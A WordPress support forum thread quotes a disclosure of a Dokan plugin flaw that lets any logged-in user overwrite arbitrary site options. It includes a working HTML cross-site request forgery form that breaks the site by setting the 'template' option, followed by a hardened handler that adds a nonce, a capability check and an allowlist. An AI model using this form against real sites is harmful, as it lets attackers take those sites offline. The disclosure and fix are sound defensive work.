• Resolved Ward

    (@yward)


    Hello,

    As per pluginvulnerabilities dot com, Dokan has a security flaw that can break the website.
    The following is a direct quote from their article.


    The plugin registers the function dismiss_upgrade_promo() to be accessible by anyone logged in to WordPress through its AJAX functionality:
    add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', array( $this, 'dismiss_upgrade_promo' ) );

    That function, which is located in the file /lib/promotions.php, will update a WordPress option (setting) specified by the POST input “promo_key” to a value modified by the POST input “key”:
    public function dismiss_upgrade_promo() {
        if ( isset( $_POST['dokan_upgrade_promotion_dismissed'] ) && $_POST['dokan_upgrade_promotion_dismissed'] ) {
            $promo_option_key        = $_POST['promo_key'];
            $promo_last_display_time = $_POST['promo_key'] . '_displayed_time';

            $already_displayed_promo = get_option( $promo_option_key, array() );

            if ( ! isset( $already_displayed_promo[ $_POST['key'] ] ) ) {
                $already_displayed_promo[ $_POST['key'] ] = array(
                    'display'        => 0,
                    'last_displayed' => current_time( 'mysql' )
                );
            }

            update_option( $promo_option_key, $already_displayed_promo );
    by replacing the “template” option with content like could be set with this you can disable the frontend and admin area of the website.

    Since there is no check for a valid nonce, this could also be exploited through cross-site request forgery (CSRF).

    Example:
    The following proof of concept will break the website, when logged in to WordPress.

    Make sure to replace “[path to WordPress]” with the location of WordPress.

    <html>
    <body>
    <form action="https://[path to WordPress]/wp-admin/admin-ajax.php?action=dokan-dismiss-upgrade-promotional-notice" method="POST">
    <input type="hidden" name="dokan_upgrade_promotion_dismissed" value="true" />
    <input type="hidden" name="promo_key" value="template" />
    <input type="hidden" name="key" value="test" />
    <input type="submit" value="Submit" />
    </form>
    </body>
    </html>
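
A hardened form of the handler quoted in the post above, as an added example that is not part of the original post and is not Dokan's own code. The nonce action `example_dismiss_promo`, the `nonce` field name, the allowlisted option name `example_promo_notices` and the `manage_options` capability are assumptions made for illustration; only WordPress core functions are used.

```php
<?php
// Added example, not Dokan's code. Names marked "hypothetical" are assumptions.

// The only option names this handler is ever allowed to write (hypothetical name).
const EXAMPLE_PROMO_OPTIONS = array( 'example_promo_notices' );

add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', 'example_dismiss_upgrade_promo' );

function example_dismiss_upgrade_promo() {
    // CSRF: stop unless the request carries a valid nonce. The notice markup must
    // send wp_create_nonce( 'example_dismiss_promo' ) in a "nonce" field (hypothetical names).
    check_ajax_referer( 'example_dismiss_promo', 'nonce' );

    // Authorization: wp_ajax_* hooks run for every logged-in user, so check a
    // capability explicitly (manage_options is an assumption about who sees the notice).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    if ( empty( $_POST['dokan_upgrade_promotion_dismissed'] ) ) {
        wp_send_json_error( 'nothing to dismiss', 400 );
    }

    // Normalise both inputs before they are used as an option name or array key.
    $option = isset( $_POST['promo_key'] ) ? sanitize_key( wp_unslash( $_POST['promo_key'] ) ) : '';
    $key    = isset( $_POST['key'] ) ? sanitize_key( wp_unslash( $_POST['key'] ) ) : '';

    // The request never chooses which option is written: anything outside the
    // allowlist (for example "template") is rejected before update_option().
    if ( ! in_array( $option, EXAMPLE_PROMO_OPTIONS, true ) || '' === $key ) {
        wp_send_json_error( 'invalid promo key', 400 );
    }

    $displayed = get_option( $option, array() );
    if ( ! is_array( $displayed ) ) {
        $displayed = array(); // Never merge into an unexpected scalar value.
    }

    if ( ! isset( $displayed[ $key ] ) ) {
        $displayed[ $key ] = array(
            'display'        => 0,
            'last_displayed' => current_time( 'mysql' ),
        );
    }

    update_option( $option, $displayed );
    wp_send_json_success();
}
```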

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Security Issue’ is closed to new replies.